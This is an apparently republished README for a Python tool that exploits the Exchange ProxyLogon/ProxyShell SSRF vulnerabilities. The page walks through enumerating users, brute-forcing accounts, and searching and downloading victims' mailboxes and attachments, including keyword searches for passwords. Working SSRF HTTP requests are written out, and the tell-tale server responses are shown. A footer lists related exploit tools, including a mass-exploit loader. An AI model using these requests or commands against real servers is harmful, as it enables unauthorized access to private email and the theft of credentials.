Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Last update: Dec 30, 2022

Overview

Some Attacks of Exchange SSRF

This project is heavily replicated in ProxyShell, NtlmRelayToEWS

https://mp.weixin.qq.com/s/GFcEKA48bPWsezNdVcrWag

Get 100 Email Users Without By Brute 无需爆破获取100条邮箱用户

run 运行程序：

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action Get

result 结果：

Email Address  : [email protected]
Email Address  : [email protected]
Email Address  : [email protected]
Email Address  : [email protected]

Brute Account 爆破可能存在的用户

file with emails 需要尝试的邮箱文件：

/tmp/emails.txt：

[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

run 运行程序：

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action Brute --file /tmp/emails.txt

result 结果：

[email protected] valid
[email protected] valid

爆破用户的几个接口一：

POST /autodiscover/[email protected]/ews/exchange.asmx HTTP/1.1
Host: mail.exchange.com
User-Agent: Python PSRP Client
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Cookie: Email=autodiscover/[email protected]
Content-Length: 776

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <m:GetFolder>
            <m:FolderShape>
                <t:BaseShape>Default</t:BaseShape>
            </m:FolderShape>
            <m:FolderIds>
                <t:DistinguishedFolderId Id="inbox">
                    <t:Mailbox>
                        <t:EmailAddress>[email protected]</t:EmailAddress>
                    </t:Mailbox>
                </t:DistinguishedFolderId>
            </m:FolderIds>
        </m:GetFolder>
    </soap:Body>
</soap:Envelope>

用户存在会提示：

Access is denied. Check credentials and try again.,

爆破用户的几个接口二：

POST /autodiscover/[email protected]/autodiscover/autodiscover.xml?=&Email=autodiscover/[email protected] HTTP/1.1
Host: mail.exchange.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36.
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 369

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
        <Request>
          <EMailAddress>[email protected]</EMailAddress>
          <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
        </Request>
    </Autodiscover>

用户不存在会提示：

The email address can't be found.

Search Contacts 搜索联系人

run 运行程序：

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action SearchC --email [email protected] --keyword test

--keyword为你想要搜索的联系人关键词。

result 结果：

[email protected]
[email protected]

Search Mails And Download (include attachment) 搜索邮箱并下载，包括附件

run 运行程序：

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action SearchM --email [email protected] --keyword password

--keyword为你想要搜索的关键词，比如"密码"。

result 结果：

[+] Item [output/password-item-0.eml] saved successfully

keyword关键词可以使用一些邮件语法，比如搜索主题时，可以用--keyword "subject:password"

Download user's emails (include attachment) 下载指定用户的邮件，包括附件

run 运行程序：

python Exchange_SSRF_Attacks.py --target mail.exchange.com --action Download --email [email protected]

result 结果：

[+] Item [output/item-0.eml] saved successfully

Some Attacks of Exchange SSRF ProxyLogon&ProxyShell

Related tags

Overview

Some Attacks of Exchange SSRF

This project is heavily replicated in ProxyShell, NtlmRelayToEWS

Get 100 Email Users Without By Brute 无需爆破获取100条邮箱用户

Brute Account 爆破可能存在的用户

Search Contacts 搜索联系人

Search Mails And Download (include attachment) 搜索邮箱并下载，包括附件

Download user's emails (include attachment) 下载指定用户的邮件，包括附件

Owner

Jumbo

CVE-2021-22986 & F5 BIG-IP RCE

How to exploit a double free vulnerability in 2021. 'Use-After-Free for Dummies'

Script checks provided domains for log4j vulnerability

ORector - A Fast Python tool designed to detect open redirects vulnerabilities on websites

Consolidating and extending hosts files from several well-curated sources. You can optionally pick extensions to block pornography, social media, and other categories.

将hw时信息收集以及简单的漏洞操作步骤简单化

MozDef: Mozilla Enterprise Defense Platform

'Our Drowsinessdetector detects drivers eyes if they are closed for more than 2 seconds and alerts driver'

VMware vCenter earlier v(7.0.2.00100) unauthorized arbitrary file read

A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

This enforces signatures for CVE-2021-44228 across all policies on a BIG-IP ASM device

Binary check tool to identify command injection and format string vulnerabilities in blackbox binaries

An IDA pro python script to decrypt Qbot malware string

All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

Early days of an Asset Discovery tool.

neo Tool is great one in binary exploitation topic

NexScanner is a tool which allows you to scan a website and find the admin login panel and sub-domains

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URL with multithreading

SPV SecurePasswordVerification

On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.